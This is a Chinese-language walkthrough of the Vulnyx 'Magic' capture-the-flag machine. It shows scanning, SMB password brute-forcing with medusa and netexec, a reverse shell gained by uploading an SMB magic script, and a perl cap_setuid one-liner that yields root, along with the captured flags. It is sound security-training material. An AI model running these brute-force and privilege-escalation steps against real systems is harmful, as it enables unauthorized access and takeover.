Vulnyx-Magic靶机详解WP

信息收集

服务探测

开了个smb服务

❯ sudo arp-scan -l
[sudo] password for ctf:
Sorry, try again.
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.140  08:00:27:46:e5:2e       (Unknown)
192.168.60.254  00:50:56:fd:82:05       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.961 seconds (130.55 hosts/sec). 4 responded
❯ export ip=192.168.60.140
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.140:22
Open 192.168.60.140:80
Open 192.168.60.140:139
Open 192.168.60.140:445
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-06 16:24 CST
Initiating ARP Ping Scan at 16:24
Scanning 192.168.60.140 [1 port]
Completed ARP Ping Scan at 16:24, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:24
Completed Parallel DNS resolution of 1 host. at 16:24, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:24
Scanning 192.168.60.140 [4 ports]
Discovered open port 139/tcp on 192.168.60.140
Discovered open port 445/tcp on 192.168.60.140
Discovered open port 22/tcp on 192.168.60.140
Discovered open port 80/tcp on 192.168.60.140
Completed SYN Stealth Scan at 16:24, 0.03s elapsed (4 total ports)
Nmap scan report for 192.168.60.140
Host is up, received arp-response (0.00049s latency).
Scanned at 2025-01-06 16:24:54 CST for 0s

PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack ttl 64
80/tcp  open  http         syn-ack ttl 64
139/tcp open  netbios-ssn  syn-ack ttl 64
445/tcp open  microsoft-ds syn-ack ttl 64
MAC Address: 08:00:27:46:E5:2E (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
           Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

访问一下80端口，是个默认的nginx页面

扫一下目录

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.140
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/backup               (Status: 301) [Size: 169] [--> http://192.168.60.140/backup/]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

就只有一个backup会301跳转，访问一下显示403报错，没权限

尝试在backup目录的基础上再次扫描

模糊扫描

扫到一个conf，依然是403报错，怀疑其目录下还有文件

❯ gobuster dir -u http://$ip/backup -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.140/backup
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/conf                 (Status: 301) [Size: 169] [--> http://192.168.60.140/backup/conf/]
Progress: 18892 / 23675 (79.80%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 19321 / 23675 (81.61%)
===============================================================
Finished
===============================================================

加一个-x参数，指定文件后缀

❯ gobuster dir -u http://$ip/backup/conf -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,conf
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.140/backup/conf
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,conf
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/smb.conf             (Status: 200) [Size: 8799]
Progress: 14202 / 14205 (99.98%)
===============================================================
Finished
===============================================================

这回终于是扫到了

smb魔术脚本

打开文件，发现是个smb的魔术脚本

详细可以参考HackMyVM-crossroads靶机详解WP | Pepster’Blog

文件中给了个用户xerosec

尝试美杜莎smb爆破一下

很明显密码就是123456

❯ medusa  -h 192.168.60.140 -u xerosec -P /usr/share/wordlists/rockyou.txt -M smbnt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

ERROR: smbnt.mod: Unknown security mode request: 00. Proceeding using ENCRYPTED password mode.
ACCOUNT CHECK: [smbnt] Host: 192.168.60.140 (1 of 1, 0 complete) User: xerosec (1 of 1, 0 complete) Password: 123456 (1 of 14344391 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.60.140 User: xerosec Password: 123456 [ERROR (0xFFFFFF:UNKNOWN_ERROR_CODE)]

连一下smb，哎不对劲啊，怎么显示未知错误代码

smbv1不能爆破吗

smb爆破

尝试换了netexec进行爆破

Password Spraying | NetExec

❯ netexec smb 192.168.60.140 -u xerosec -p /usr/share/seclists/Passwords/richelieu-french-top5000.txt
SMB         192.168.60.140  445    MAGIC            [+] MAGIC\xerosec:david1

很快拿到了密码

再次连接一下smb

❯ smbclient -U xerosec //$ip/tmp
Password for [WORKGROUP\xerosec]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan  6 19:49:11 2025
  ..                                  D        0  Thu Jan  2 21:06:27 2025
  .font-unix                         DH        0  Mon Jan  6 19:49:08 2025
  .ICE-unix                          DH        0  Mon Jan  6 19:49:08 2025
  .X11-unix                          DH        0  Mon Jan  6 19:49:08 2025
  .XIM-unix                          DH        0  Mon Jan  6 19:49:08 2025
  systemd-private-1c2ec0fc98bb47d59d82b7d86a17396c-systemd-logind.service-WyQhcg      D        0  Mon Jan  6 19:49:09 2025

                19480400 blocks of size 1024. 16510872 blocks available
smb: \> put

用户提权

果不其然，那我们创建一下config.sh的魔术脚本

传上去的一瞬间会卡住

另一边监听端口即可

❯ vim config.sh
❯ smbclient -U xerosec //$ip/tmp
Password for [WORKGROUP\xerosec]:
Try "help" to get a list of possible commands.
smb: \> put config.sh
-----------分隔--------
❯ pwncat-cs -lp 4444
[20:35:50] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[20:36:00] received connection from 192.168.60.140:46142                                                                                    bind.py:84
[20:36:00] 192.168.60.140:46142: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) xerosec@magic:/tmp$ id
uid=1000(xerosec) gid=1000(xerosec) grupos=1000(xerosec)
(remote) xerosec@magic:/tmp$ cd ~
(remote) xerosec@magic:/home/xerosec$ ls
user.txt
(remote) xerosec@magic:/home/xerosec$ cat user.txt
d14885ecd144685ad228d66e275d715e

Root提权

发现这个用户又sudo权限，不过这个id尼玛怎么提权啊⁉️

他只能打印用户的id组id之类的，这是个陷阱

再次收集信息

可以看到perl有setuid的能力

(remote) xerosec@magic:/home/xerosec$ sudo -l
Matching Defaults entries for xerosec on magic:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User xerosec may run the following commands on magic:
    (root) NOPASSWD: /usr/bin/id
(remote) xerosec@magic:/home/xerosec$ getcap -r /
/usr/bin/perl5.36.0 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/perl cap_setuid=ep

直接利用即可，不过为啥ps1会变成有反斜杠的搞不懂❓

(remote) xerosec@magic:/home/xerosec$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
\[\](remote)\[\] \[\]root@magic\[\]:\[\]/home/xerosec\[\]$ id
uid=0(root) gid=1000(xerosec) grupos=1000(xerosec)
\[\](remote)\[\] \[\]root@magic\[\]:\[\]/home/xerosec\[\]$ cat /root/root.txt
8e90ffd47b5164f275c42955a2531eef